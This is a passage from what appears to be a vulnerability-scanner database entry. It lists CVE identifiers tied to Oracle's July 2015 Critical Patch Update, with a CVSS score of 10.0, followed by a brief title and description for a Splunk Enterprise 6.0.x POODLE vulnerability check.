"CVE-2015-4733", "CVE-2015-2646", "CVE-2014-1568", "CVE-2015-2651", "CVE-2015-2603", "CVE-2014-8091", "CVE-2015-4765", "CVE-2015-2660", "CVE-2015-2604", "CVE-2015-0255", "CVE-2015-4772", "CVE-2015-2662", "CVE-2015-4735", "CVE-2015-0468", "CVE-2015-4779", "CVE-2015-0209", "CVE-2015-2585", "CVE-2013-2186", "CVE-2014-3567", "CVE-2015-2614", "CVE-2014-0015", "CVE-2015-4737", "CVE-2015-4776", "CVE-2015-4757", "CVE-2015-4728", "CVE-2015-2637", "CVE-2015-2606", "CVE-2015-4769", "CVE-2015-0204", "CVE-2015-2621", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-2638", "CVE-2015-4740", "CVE-2015-2619", "CVE-2015-4731", "CVE-2014-8095", "CVE-2015-4727", "CVE-2015-4741", "CVE-2015-2636", "CVE-2015-2659", "CVE-2015-2655", "CVE-2015-4775", "CVE-2015-4773", "CVE-2014-8102", "CVE-2015-0291", "CVE-2015-4746", "CVE-2015-2629", "CVE-2014-8096", "CVE-2015-4788", "CVE-2015-4755", "CVE-2015-2602", "CVE-2015-4748", "CVE-2015-0287", "CVE-2015-2622", "CVE-2015-2610", "CVE-2012-0036", "CVE-2013-2174", "CVE-2015-2663", "CVE-2015-4742", "CVE-2014-8093", "CVE-2015-0289", "CVE-2015-2652", "CVE-2015-4759", "CVE-2015-0446", "CVE-2015-0292", "CVE-2015-2582", "CVE-2015-4780", "CVE-2014-1569", "CVE-2015-4781", "CVE-2015-2618", "CVE-2015-2641", "CVE-2015-2593", "CVE-2015-4744", "CVE-2015-2598", "CVE-2014-0138", "CVE-2015-2587", "CVE-2015-2630", "CVE-2015-2592", "CVE-2015-4767", "CVE-2015-0290", "CVE-2015-2616", "CVE-2015-0205", "CVE-2015-2624", "CVE-2015-2609", "CVE-2015-4777", "CVE-2010-1323", "CVE-2015-1787", "CVE-2015-4754", "CVE-2014-3569", "CVE-2015-2588", "CVE-2015-4760", "CVE-2015-2583", "CVE-2015-4743", "CVE-2013-4545", "CVE-2015-4752", "CVE-2015-2586", "CVE-2015-4753", "CVE-2015-2649", "CVE-2015-2612", "CVE-2015-2644"], "modified": "2016-07-07T00:00:00", "href": "", "id": "ORACLE:CPUJUL2015-2367936", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}}

Splunk Enterprise 6.0.x &lt; 6.0.7 Multiple Vulnerabilities (POODLE)

Description

Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)